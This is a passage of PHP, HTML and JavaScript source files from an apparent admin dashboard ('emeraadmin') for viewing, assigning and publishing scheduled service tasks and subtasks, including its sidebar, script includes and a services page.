taskids.filter(id => id !== checkbox.value); } }); }); console.log(taskids); makePublicButton.addEventListener('click', function () { if (taskids.length > 0) { const formData = new FormData(); formData.append('taskIds', taskids.join(',')); fetch('make_tasks_public.php', { method: 'POST', body: formData }) .then(response => response.json()) .then(data => { if (data.status === 'success') { Swal.fire({ title: 'Tasks Made Public Successfully', text: `Task(s) made public successfully.`, icon: 'success', confirmButtonText: 'Ok' }).then(() => { window.location.reload(); }); } else { Swal.fire({ title: 'Error', text: data.message || 'Failed to make tasks public. Please try again.', icon: 'error', confirmButtonText: 'Ok' }); } }) .catch(error => { console.error('Error making tasks public:', error); Swal.fire({ title: 'Error', text: error.message || 'Failed to make tasks public. Please try again.', icon: 'error', confirmButtonText: 'Ok' }); }); } else { Swal.fire({ title: 'No Tasks Selected', text: 'Please select at least one task to make public.', icon: 'warning', confirmButtonText: 'Ok' }); } }); }); </script> emeraadmin/ongoingtasks.php000064400000020037151676701240012100 0ustar00<?php include('head.php'); // Include database connection and TaskService class require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; $System = new System(); // Create TaskService instance $taskService = new TaskService(); // Initialize filters array $filters = []; // Check for filter inputs and add to the filters array if ($_SERVER['REQUEST_METHOD'] == 'GET') { if (!empty($_GET['service_name'])) { $filters['service_name'] = filter_input(INPUT_GET, 'service_name', FILTER_SANITIZE_STRING); } if (!empty($_GET['region'])) { $filters['region'] = filter_input(INPUT_GET, 'region', FILTER_SANITIZE_STRING); } if (!empty($_GET['frequency'])) { $filters['frequency'] = filter_input(INPUT_GET, 'frequency', FILTER_SANITIZE_STRING); } } // Fetch tasks from the database based on filters $tasks = $taskService->getAllOngoingTasks($filters); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View ongoing Tasks</h5> <span>View all ongoing tasks</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">View Tasks</li> </ol> </nav> </div> </div> </div> <!-- Search Form --> <div class="row mb-3"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>Search Tasks</h3> </div> <div class="card-body"> <form method="GET" action=""> <div class="form-row"> <div class="form-group col-md-2"> <label for="service_name">Service Name</label> <input type="text" class="form-control" id="service_name" name="service_name" placeholder="Enter service name" value="<?php echo htmlspecialchars($_GET['service_name'] ?? ''); ?>"> </div> <div class="form-group col-md-2"> <label for="region">Region</label> <input type="text" class="form-control" id="region" name="region" placeholder="Enter region" value="<?php echo htmlspecialchars($_GET['region'] ?? ''); ?>"> </div> <div class="form-group col-md-2"> <label for="frequency">Frequency</label> <select class="form-control" id="frequency" name="frequency"> <option value="">Select</option> <option value="daily" <?php echo (isset($_GET['frequency']) && $_GET['frequency'] === 'daily') ? 'selected' : ''; ?>>Daily</option> <option value="3x/week" <?php echo (isset($_GET['frequency']) && $_GET['frequency'] === '3x/week') ? 'selected' : ''; ?>>3x/week</option> </select> </div> </div> <button type="submit" class="btn btn-primary">Apply Filters</button> <a href="ongoingtasks.php" class="btn btn-secondary">Clear Filters</a> </form> </div> </div> </div> </div> <!-- End of Search Form --> <!-- Task viewing section --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"><h3>View Tasks</h3></div> <div class="card-body"> <table id="advanced_table" class="table"> <thead> <tr> <th>#</th> <th>Service Name</th> <th>Region</th> <th>Frequency</th> <th>Created By</th> <th>Created At</th> <th>Finished</th> <th>Assigned</th> <th>Assigned To</th> <th>Accepted</th> <th>Public Status</th> <th>Actions</th> </tr> </thead> <tbody> <?php if (!empty($tasks)): ?> <?php foreach ($tasks as $task): ?> <tr> <td><?php echo 'TSK-000'.htmlspecialchars($task->id); ?></td> <td><?php echo htmlspecialchars($task->service_name); ?></td> <td><?php echo htmlspecialchars($task->region); ?></td> <td><?php echo htmlspecialchars($task->frequency); ?></td> <td><?php echo htmlspecialchars($task->added_by_name); ?></td> <td><?php echo date('F j, Y, g:i a', strtotime($task->created_at)); ?></td> <td><?php echo ($task->finished ? '<label class="badge badge-success">Finished</label>' : '<label class="badge badge-danger">Not Finished</label>'); ?></td> <td><?php echo ($task->is_assigned ? '<label class="badge badge-success">Assigned</label>' : '<label class="badge badge-danger">Not Assigned</label>'); ?></td> <td><?php echo htmlspecialchars($task->assigned_to_name); ?></td> <th><?php echo ($task->accepted ? ' <label class="badge badge-success">Accepted</label>' : '<label class="badge badge-yellow">Not Accepted</label>'); ?></th> <td><label class="badge badge-<?php echo $task->isPublic ? 'yellow' : 'green'; ?>"><?php echo $task->isPublic ? 'Public' : 'Not Public'; ?></label></td> <td><a href="viewtask.php?id=<?php echo htmlspecialchars($System->encryptData($task->id)); ?>" class="btn btn-primary">View Details</a></td> </tr> <?php endforeach; ?> <?php else: ?> <tr> <td colspan="10">No tasks found.</td> </tr> <?php endif; ?> </tbody> </table> </div> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> emeraadmin/viewtask.php000064400000123350151676701240011231 0ustar00<?php include('head.php'); // Include database connection and TaskService class require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; $System = new System(); // Create TaskService instance $taskService = new TaskService(); // Check if task ID is provided in URL if (isset($_GET['id'])) { // Fetch task details based on ID $taskId = $System->decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$taskId) { echo '<script> Swal.fire({ title: "Invalid task ID", text: "The URL parameter is invalid. Please go back and try again.", icon: "error", confirmButtonText: "Ok" }).then(() => { window.location.href = "tasks.php"; }); </script>'; } $task = $taskService->getTaskById($taskId); // show error if the task is not found with Swal alert if (!$task) { exit(); } } else { echo '<p>No task ID provided.</p>'; } $subtasks = $taskService->getSubtasksByTaskId($taskId); $subtaskDates = ''; for ($i = 0; $i < count($subtasks); $i++) { $subtaskDates .= '"' . $subtasks[$i]->subtask_date . '"'; if ($i < count($subtasks) - 1) { $subtaskDates .= ','; } } ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-box bg-blue"></i> <div class="d-inline"> <h5>View Task</h5> <span>View details of a task</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">View Task</li> </ol> </nav> </div> </div> </div> <!-- New row for buttons and actions --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <div class="card-header-left"> <a href="javascript:history.back()" class="btn btn-outline-primary">Back</a> </div> <div class="card-header-right"> <?php if (!$task->is_assigned) { //echo '<a href="viewcompany.php?id=' . $System->encryptData($task->assigned_to) . '" class="btn btn-primary">View assigned company</a>'; echo '<button type="button" class="btn btn-primary" data-toggle="modal" data-target="#AssignTaskModal">Assign to a Subcontractor</button>'; } if (!$task->is_assigned && !$task->isPublic) { echo ' <button type="button" class="btn btn-success" data-toggle="modal" name="makePublic" id="makePublic">Make Public </button>'; } ?> </div> </div> </div> </div> </div> <!-- Modal to assign task to a company --> <div class="modal fade" id="AssignTaskModal" role="dialog" aria-labelledby="exampleModalCenterLabel" aria-hidden="true"> <div class="modal-dialog modal-lg mt-0 mb-0" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterLabel">Assign Task to Company</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button> </div> <div class="modal-body"> <form id="tasksForm"> <div class="row"> <div class="col-md-6"> <div class="form-group row"> <div class="col-sm-9"> <input type="hidden" id="schedule-id" name="schedule-id" class="form-control" value="<?php echo $taskId; ?>" readonly> </div> </div> <div class="form-group row"> <label for="companyId" class="col-sm-3 col-form-label">Subcontractor</label> <div class="col-sm-9"> <select id="companyId" name="companyId" class="form-control select2"> <!-- PHP code to fetch and display companies --> <?php // Fetch company list from the database $companies = $taskService->getAllCompanies(); if ($companies) { foreach ($companies as $company) { echo '<option value="' . $company->id . '">' . $company->first_name . " " . $company->last_name . '</option>'; } } else { echo '<option value="">No companies available</option>'; } ?> </select> </div> </div> </div> </div> </form> <div id="message" class="mt-3"></div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button> <button type="button" form="tasksForm" id="assignTask" class="btn btn-primary">Assign Task </button> </div> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="AddSubtaskModal" tabindex="-1" role="dialog" aria-labelledby="AddSubtaskModalLabel" aria-hidden="true"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="AddSubtaskModalLabel">Add Subtask</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <form id="addSubtaskForm"> <div class="modal-body"> <input type="hidden" name="task_id" value="<?php echo $taskId; ?>"> <input type="hidden" class="form-control" id="service_name" name="service_name" value="<?php echo $task->service_id; ?>"> <div class="form-group"> <label for="subtask_date">Subtask Date</label> <input type="date" class="form-control" id="subtask_date" name="subtask_date" required> </div> <div class="form-group"> <label for="subtask_time">Subtask Time</label> <input type="time" class="form-control" id="subtask_time" name="subtask_time" required> <!-- <label for="subtask_time">Subtask Time</label>--> <!-- <input type="time" class="form-control" id="subtask_time" name="subtask_time">--> </div> <!-- Add more fields as needed --> <script> //Disable all dates before today var today = new Date(); var dd = today.getDate(); var mm = today.getMonth() + 1; //January is 0! var yyyy = today.getFullYear(); if (dd < 10) { dd = '0' + dd } if (mm < 10) { mm = '0' + mm } today = yyyy + '-' + mm + '-' + dd; document.getElementById("subtask_date").setAttribute("min", today); </script> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button> <button type="submit" class="btn btn-primary">Save changes</button> </div> </form> <script> var addSubtaskForm = document.getElementById('addSubtaskForm'); if (addSubtaskForm) { addSubtaskForm.addEventListener('submit', function (e) { e.preventDefault(); var formData = new FormData(addSubtaskForm); var xhr = new XMLHttpRequest(); xhr.open('POST', 'add_subtask.php', true); xhr.onreadystatechange = function () { if (xhr.readyState == 4 && xhr.status == 200) { console.log(xhr.responseText); // Log the response if (xhr.responseText === 'Subtask added successfully!') { Swal.fire({ title: 'Subtask added successfully.', icon: 'success', confirmButtonText: 'Ok' }); // Optionally reload the page after a short delay setTimeout(() => { window.location.reload(); }, 2000); } else if (xhr.responseText === 'error') { Swal.fire({ title: 'An error occurred', text: 'Please try again.', icon: 'error', confirmButtonText: 'Ok' }); } else if (xhr.responseText === 'invalid_data') { Swal.fire({ title: 'Invalid data', text: 'Please check the data and try again.', icon: 'error', confirmButtonText: 'Ok' }); } else if (xhr.responseText === 'invalid_request') { Swal.fire({ title: 'Invalid request', text: 'Please check the request and try again.', icon: 'error', confirmButtonText: 'Ok' }); } } }; xhr.send(formData); }); } else { console.error('Add subtask form not found.'); } </script> </div> </div> </div> <div class="row"> <div class="col-xl-6 col-md-6"> <div class="card "> <div class="card-body"> <div class="row align-items-center mb-30"> <div class="col-md-7"> <table> <tbody> <tr> <td><i class="ik ik-layers icon-large"></i></td> <td><h3 class="mb-0 fw-700 text-black"><?php echo $task->service_name; ?> </h3> </td> </tr> <tr> <td><i class="ik ik-map-pin icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $task->region; ?> </h5></td> </tr> <tr> <td><i class="ik ik-calendar icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $task->schedule_name; ?> </h5> </td> </tr> <tr> <td><i class="ik ik-clock icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $task->frequency; ?> </h5> </td> </tr> <tr> <td><i class="ik ik-check-circle icon-large"></i></td> <td> <h2><?php echo($task->finished ? '<span class="badge badge-success">Task completed</span>' : '<span class="badge badge-danger">Not Completed</span>'); ?></h2> </td> </tr> <!-- is public or not--> <tr> <td><i class="ik ik-eye icon-large"></i></td> <td> <h2><?php echo($task->isPublic ? '<span class="badge badge-yellow">Public</span>' : '<span class="badge badge-success">Not Public</span>'); ?></h2> </td> </tr> <tr> <td><i class="ik ik-user-check icon-large"></i></td> <td> <h2><?php echo($task->is_assigned ? '<span class="badge badge-success">Assigned</span>' : '<span class="badge badge-danger">Not Assigned</span>'); ?></h2> </td> </tr> <?php if ($task->is_assigned) : ?> <tr> <td><i class="ik ik-user icon-large"></i></td> <td><h6>Task Assigned To <?php echo $task->assigned_to_name; ?></h6></td> </tr> <?php endif; ?> </tbody> </table> <style> table { width: 100%; border-collapse: collapse; } td { padding: 10px 15px; vertical-align: middle; } .icon-large { font-size: 24px; color: #333; } .mb-0 { margin-bottom: 0; } .fw-700 { font-weight: 700; } .fw-500 { font-weight: 500; } .text-black { color: #000; } .badge-success { background-color: #28a745; color: #fff; padding: 5px 10px; border-radius: 5px; } .badge-danger { background-color: #dc3545; color: #fff; padding: 5px 10px; border-radius: 5px; } </style> </div> <div class="col-md-4"> <?php // Assuming $task->dates is a JSON string $datesJson = $task->dates; // Decode the JSON string to an array $datesArray = json_decode($datesJson, true); // Extract the dates and format them for JavaScript $formattedDates = array_map(function ($dateEntry) { return '"' . $dateEntry['date'] . '"'; }, $datesArray); $jsDates = implode(",", $formattedDates); // Convert the array to a comma-separated string ?> <div id="datepicker"></div> <script> flatpickr("#datepicker", { enable: [<?php echo $jsDates; ?>], // Array of selectable dates dateFormat: "Y-m-d", // Date format inline: true, // Show calendar inline defaultDate: today, // Highlighted date disableMobile: "false" }); </script> </div> </div> </div> </div> </div> <!-- Form to assign task to a company --> <div class="col-md-6"> <div class="card"> <div class="card-header"> <h3>Subtasks</h3> <div class="card-header-right"> <?php if ($task->is_assigned == 0) { echo '<button type="button" class="btn btn-success" data-toggle="modal" data-target="#AddSubtaskModal">Add Subtask </button>'; } ?> <!--button to ignore selected subtasks--> <button type="button" class="btn btn-danger" id="ignoreSubtasks">Ignore Selected Subtasks </button> <script> //Show ignoreSubtasks if any subtask is selected var ignoreSubtasks = document.getElementById('ignoreSubtasks'); var checkboxes = document.querySelectorAll('.select_all_child'); checkboxes.forEach(function (checkbox) { checkbox.addEventListener('change', function () { var checked = document.querySelectorAll('.select_all_child:checked'); if (checked.length > 0) { ignoreSubtasks.style.display = 'block'; } else { ignoreSubtasks.style.display = 'none'; } }); }); ignoreSubtasks.addEventListener('click', function () { var checked = document.querySelectorAll('.select_all_child:checked'); var subtaskIds = []; checked.forEach(function (checkbox) { // Assuming the subtask ID is in the text content and needs to be trimmed var subtaskId = checkbox.parentElement.nextElementSibling.textContent.trim(); // Remove the first two characters subtaskId = subtaskId.substring(6); subtaskIds.push(subtaskId); }); console.log(subtaskIds); // check if any subtask is selected if (subtaskIds.length === 0) { Swal.fire({ title: 'No subtasks selected', text: 'Please select one or more subtasks to ignore.', icon: 'warning', confirmButtonText: 'Ok' }); return; } else { Swal.fire({ title: 'Are you sure?', text: "Do you want to ignore the selected subtasks?", icon: 'warning', showCancelButton: true, confirmButtonText: 'Yes, ignore them!', cancelButtonText: 'No, cancel' }).then((result) => { if (result.isConfirmed) { var xhr = new XMLHttpRequest(); xhr.open('POST', 'ignore_subtasks.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange = function () { if (xhr.readyState == 4 && xhr.status == 200) { var response = JSON.parse(xhr.responseText); if (response.status === 'success') { Swal.fire({ title: 'Subtasks ignored successfully.', icon: 'success', confirmButtonText: 'Ok' }); // Optionally reload the page after a short delay setTimeout(() => { window.location.reload(); }, 2000); } else { let errorMessage = response.message || 'An error occurred. Please try again.'; Swal.fire({ title: 'Error', text: errorMessage, icon: 'error', confirmButtonText: 'Ok' }); } } }; xhr.send('subtaskIds=' + JSON.stringify(subtaskIds)); } }); } }); </script> </div> </div> <div class="card-body"> <!-- PHP code to fetch and display subtasks --> <?php // Fetch and display subtasks associated with the task // Display subtasks if ($subtasks) { ?> <table class="table" id="advanced_table"> <thead> <tr> <th>#</th> <th>Id</th> <th>Date</th> <th>Updated At</th> <th>Assigned</th> <th>Completed</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($subtasks as $subtask) { ?> <tr> <?php if (!$subtask->completed && !$subtask->ignored) { echo '<td><input type="checkbox" class="select_all_child" id="selectall_<?php echo strtotime($date); ?>"></td> '; } else { echo '<td></td>'; } ?> <td> ST-000<?php echo $subtask->id; ?></td> <td><?php echo $subtask->subtask_date; ?></td> <td><?php echo date('F j, Y, g:i a', strtotime($subtask->updated_at)); ?></td> <td><?php echo($subtask->assigned ? '<span class="badge badge-success">Assigned</span>' : '<span class="badge badge-danger">Not Assigned</span>'); ?></td> <td> <?php if ($subtask->ignored) { echo '<span class="badge badge-warning">Ignored</span>'; } else { echo $subtask->completed ? '<span class="badge badge-success">Completed</span>' : '<span class="badge badge-danger">Not Completed</span>'; } ?> </td> <td> <a href="viewsubtask.php?id=<?php echo $System->encryptData($subtask->id); ?>" class="btn btn-primary">View</a> <!-- if subtask is not assigned to any company then delete button will be shown --> <?php if ($subtask->assigned == 0 && $task->is_assigned == 0) { echo '<button type="button" class="btn btn-danger delete-subtask" data-subtask-id="' . $subtask->id . '">Delete</button>'; } ?> </td> </tr> <?php } ?> </tbody> </table> <?php } else { echo '<p>No subtasks found for this task.</p>'; } ?> </div> </div> </div> </div> </div> </div> <script> var assignTaskButton = document.getElementById('assignTask'); if (assignTaskButton) { assignTaskButton.addEventListener('click', function () { console.log('Assign task button found.'); var companyId = document.getElementById('companyId').value; if (companyId) { Swal.fire({ title: 'Are you sure?', text: "Do you want to assign this task to the selected company?", icon: 'warning', showCancelButton: true, confirmButtonText: 'Yes, assign it!', cancelButtonText: 'No, cancel' }).then((result) => { if (result.isConfirmed) { var xhr = new XMLHttpRequest(); xhr.open('POST', 'assigntask.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange = function () { if (xhr.readyState == 4 && xhr.status == 200) { console.log(xhr.responseText); // Log the response if (xhr.responseText === 'success') { Swal.fire({ title: 'Task assigned successfully.', icon: 'success', confirmButtonText: 'Ok' }); // Optionally reload the page after a short delay setTimeout(() => { window.location.reload(); }, 2000); } else if (xhr.responseText === 'error') { Swal.fire({ title: 'An error occurred', text: 'Please try again.', icon: 'error', confirmButtonText: 'Ok' }); } else if (xhr.responseText === 'task_not_found') { Swal.fire({ title: 'Task not found', text: 'Please check the task ID.', icon: 'error', confirmButtonText: 'Ok' }); } else if (xhr.responseText === 'invalid_data') { Swal.fire({ title: 'Invalid data', text: 'Please check the data and try again.', icon: 'error', confirmButtonText: 'Ok' }); } else if (xhr.responseText === 'invalid_request') { Swal.fire({ title: 'Invalid request', text: 'Please check the request and try again.', icon: 'error', confirmButtonText: 'Ok' }); } } }; var taskId = '<?php echo htmlspecialchars($taskId); ?>'; xhr.send('taskId=' + taskId + '&companyId=' + companyId); } }); } }); } else { console.error('Assign task button not found.'); } // make public button var makePublicButton = document.getElementById('makePublic'); if (makePublicButton) { makePublicButton.addEventListener('click', function () { console.log('Make public button found.'); Swal.fire({ title: 'Are you sure?', text: "Do you want to make this task public?", icon: 'warning', showCancelButton: true, confirmButtonText: 'Yes, make it public!', cancelButtonText: 'No, cancel' }).then((result) => { if (result.isConfirmed) { var xhr = new XMLHttpRequest(); xhr.open('POST', 'makepublic.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange = function () { if (xhr.readyState == 4 && xhr.status == 200) { console.log(xhr.responseText); // Log the response if (xhr.responseText === 'success') { Swal.fire({ title: 'Task made public successfully.', icon: 'success', confirmButtonText: 'Ok' }); // Optionally reload the page after a short delay setTimeout(() => { window.location.reload(); }, 2000); } else if (xhr.responseText === 'error') { Swal.fire({ title: 'An error occurred', text: 'Please try again.', icon: 'error', confirmButtonText: 'Ok' }); } else if (xhr.responseText === 'task_not_found') { Swal.fire({ title: 'Task not found', text: 'Please check the task ID.', icon: 'error', confirmButtonText: 'Ok' }); } else if (xhr.responseText === 'invalid_data') { Swal.fire({ title: 'Invalid data', text: 'Please check the data and try again.', icon: 'error', confirmButtonText: 'Ok' }); } else if (xhr.responseText === 'invalid_request') { Swal.fire({ title: 'Invalid request', text: 'Please check the request and try again.', icon: 'error', confirmButtonText: 'Ok' }); } } }; var taskId = '<?php echo htmlspecialchars($taskId); ?>'; xhr.send('taskId=' + taskId); } }); }); } else { console.error('Make public button not found.'); } document.addEventListener('DOMContentLoaded', function () { // Find all delete buttons and attach click event var deleteButtons = document.querySelectorAll('.delete-subtask'); deleteButtons.forEach(function (button) { button.addEventListener('click', function () { var subtaskId = button.getAttribute('data-subtask-id'); // Show confirmation dialog using SweetAlert Swal.fire({ title: 'Are you sure?', text: "You won't be able to revert this!", icon: 'warning', showCancelButton: true, confirmButtonColor: '#3085d6', cancelButtonColor: '#d33', confirmButtonText: 'Yes, delete it!' }).then((result) => { if (result.isConfirmed) { // If confirmed, make AJAX request to delete_subtask.php var xhr = new XMLHttpRequest(); xhr.open('POST', 'delete_subtask.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange = function () { if (xhr.readyState == 4 && xhr.status == 200) { console.log(xhr.responseText); // Log the response for debugging if (xhr.responseText === 'success') { Swal.fire({ title: 'Deleted!', text: 'Your subtask has been deleted.', icon: 'success' }).then(() => { window.location.reload(); // Reload the page after deletion }); } else { Swal.fire({ title: 'Error!', text: 'Failed to delete subtask.', icon: 'error' }); } } }; xhr.send('subtaskId=' + subtaskId); // Send subtask ID to delete_subtask.php } }); }); }); }); </script> <?php include('footer.php'); ?> emeraadmin/scripts.php000064400000006374151676701240011071 0ustar00 <script src="../../node_modules/popper.js/dist/umd/popper.min.js"></script> <script src="../../node_modules/bootstrap/dist/js/bootstrap.min.js"></script> <script src="../../node_modules/perfect-scrollbar/dist/perfect-scrollbar.min.js"></script> <script src="../../node_modules/screenfull/dist/screenfull.js"></script> <script src="../../node_modules/flatpickr/dist/flatpickr.js"></script> <script src="../../node_modules/sweetalert2/dist/sweetalert2.all.min.js"></script> <script src="../../dist/js/theme.min.js"></script> <script src="../../node_modules/popper.js/dist/umd/popper.min.js"></script> <script src="../../node_modules/datatables.net/js/jquery.dataTables.min.js"></script> <script src="../../node_modules/datatables.net-bs4/js/dataTables.bootstrap4.min.js"></script> <script src="../../node_modules/datatables.net-responsive/js/dataTables.responsive.min.js"></script> <script src="../../node_modules/datatables.net-responsive-bs4/js/responsive.bootstrap4.min.js"></script> <script src="../../node_modules/d3/dist/d3.min.js"></script> <script src="../../node_modules/c3/c3.min.js"></script> <script src="../../js/tables.js"></script> <!--<script src="../../js/widgets.js"></script>--> <script src="../../js/charts.js"></script> <script type="text/javascript" charset="utf8" src="https://code.jquery.com/jquery-3.5.1.js"></script> <script type="text/javascript" charset="utf8" src="https://cdn.datatables.net/1.10.24/js/jquery.dataTables.js"></script> <script src="../../node_modules/flatpickr/dist/flatpickr.min.js"></script> <script src="../../node_modules/select2/dist/js/select2.min.js"></script> <script src="../../node_modules/bootstrap-tagsinput/dist/bootstrap-tagsinput.min.js"></script> <script src="../../node_modules/jquery.repeater/jquery.repeater.min.js"></script> <!--<script src="../../node_modules/mohithg-switchery/dist/switchery.min.js"></script>--> <!--<script src="../../js/form-advanced.js"></script>--> <!-- Google Analytics: change UA-XXXXX-X to be your site's ID. --> <script> (function(b,o,i,l,e,r){b.GoogleAnalyticsObject=l;b[l]||(b[l]= function(){(b[l].q=b[l].q||[]).push(arguments)});b[l].l=+new Date; e=o.createElement(i);r=o.getElementsByTagName(i)[0]; e.src='https://www.google-analytics.com/analytics.js'; r.parentNode.insertBefore(e,r)}(window,document,'script','ga')); ga('create','UA-XXXXX-X','auto');ga('send','pageview'); </script> <script> var scriptUrls = {}; var scripts = document.getElementsByTagName('script'); for (var i = 0; i < scripts.length; i++) { var src = scripts[i].src; if (src && !scriptUrls[src]) { scriptUrls[src] = true; } else { scripts[i].parentNode.removeChild(scripts[i]); } } </script> <script> $(document).ready(function() { $('.select2').select2(); }); </script> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/js/bootstrap-datepicker.min.js"></script> <script src="../../node_modules/select2/dist/js/select2.min.js"></script> <script src="https://cdn.datatables.net/1.10.24/js/jquery.dataTables.min.js"></script> </body> </html> emeraadmin/sidebar.php000064400000010246151676701240011004 0ustar00<div class="app-sidebar colored"> <div class="sidebar-header"> <a class="header-brand" href="#"> <div class="logo-img"> <!-- <img src="../../src/img/Emera-Primary-Logo.png" class="header-brand-img" alt="Emera Primary Logo" height="50px">--> </div> <img src="../../src/img/Emera-Primary-Logo-White.png" class="header-brand-img" alt="Emera Primary Logo" height="50px"> </a> <button type="button" class="nav-toggle"><i data-toggle="expanded" class="ik ik-toggle-right toggle-icon"></i></button> <button id="sidebarClose" class="nav-close"><i class="ik ik-x"></i></button> </div> <div class="sidebar-content"> <div class="nav-container"> <nav id="main-menu-navigation" class="navigation-main"> <div class="nav-item"> <a href="dashboard.php"><i class="ik ik-bar-chart-2"></i><span>Dashboard</span></a> </div> <div class="nav-lavel">Schedules</div> <div class="nav-item"> <a href="viewschedules.php"><i class="ik ik-calendar"></i><span>Schedules</span></a> <a href="uploadSchedule.php"><i class="ik ik-upload"></i><span>Upload Schedules</span></a> </div> <div class="nav-lavel">Tasks</div> <div class="nav-item"> <a href="viewtasks.php"><i class="ik ik-box"></i><span>All Tasks</span></a> <a href="assigntasks.php"><i class="ik ik-corner-right-down"></i><span>Assign Tasks</span></a> <a href="unacceptedtasks.php"><i class="ik ik-alert-triangle"></i><span>Unaccepted Tasks</span></a> <a href="ongoingtasks.php"><i class="ik ik-fast-forward"></i><span>Ongoing Tasks</span></a> </div> <div class="nav-lavel">Sub Tasks</div> <div class="nav-item"> <a href="submitsubtaskmanually.php"><i class="ik ik-plus-circle"></i><span>Submit Sub Task Manually</span></a> </div> <div class="nav-lavel">Reports</div> <div class="nav-item"> <a href="reports.php"><i class="ik ik-pie-chart"></i><span>Reports</span></a> </div> <div class="nav-lavel">Data</div> <div class="nav-item"> <a href="exportScheduleData.php"><i class="ik ik-download"></i><span>Export Schedule Data</span></a> </div> <div class="nav-lavel">Users</div> <div class="nav-item"> <a href="viewusers2.php"><i class="ik ik-users"></i><span>System Users</span></a> </div> <div class="nav-lavel">Services</div> <div class="nav-item"> <a href="viewservices.php"><i class="ik ik-map-pin"></i><span>Service Locations</span></a> </div> <div class="nav-lavel">Logout</div> <div class="nav-item"> <a href="../logout.php" id="logout-link"><i class="ik ik-power"></i><span>Logout</span></a> </div> <script> document.getElementById('logout-link').addEventListener('click', function(event) { event.preventDefault(); // Prevent the default action Swal.fire({ title: 'Are you sure?', text: "You want to log out?", icon: 'warning', showCancelButton: true, confirmButtonColor: '#3085d6', cancelButtonColor: '#d33', confirmButtonText: 'Yes, log out!' }).then((result) => { if (result.isConfirmed) { window.location.href ='../logout.php'; } }); }); </script> </nav> </div> </div> </div>emeraadmin/viewservices.php000064400000024772151676701240012122 0ustar00<?php include('head.php'); require_once '../../Service/ServiceService.php'; require_once '../../Classes/System.php'; $System = new System(); $serviceService = new ServiceService(); $services = $serviceService->getAllServices(); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Services</h5> <span>View all services</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Services</a> </li> <li class="breadcrumb-item active" aria-current="page">View Services</li> </ol> </nav> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <button type="button" class="btn btn-primary" data-toggle="modal" data-target="#exampleModalCenter"> <i class="ik ik-plus"></i> Create Service </button> </div> </div> </div> </div> <div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterLabel" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterLabel">Add a new service</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> <form id="serviceForm" class="forms-sample"> <div class="form-group row"> <label for="name" class="col-sm-3 col-form-label">Name:</label> <div class="col-sm-9"> <input type="text" id="name" name="name" class="form-control" required placeholder="Enter service name"> </div> </div> <div class="form-group row"> <label for="region" class="col-sm-3 col-form-label">Region:</label> <div class="col-sm-9"> <input type="text" id="region" name="region" class="form-control" required placeholder="Enter region"> </div> </div> <div class="form-group row"> <label for="address_line1" class="col-sm-3 col-form-label">Address Line 1:</label> <div class="col-sm-9"> <input type="text" id="address_line1" name="address_line1" class="form-control" placeholder="Enter address line 1"> </div> </div> <div class="form-group row"> <label for="address_line2" class="col-sm-3 col-form-label">Address Line 2:</label> <div class="col-sm-9"> <input type="text" id="address_line2" name="address_line2" class="form-control" placeholder="Enter address line 2"> </div> </div> <div class="form-group row"> <div 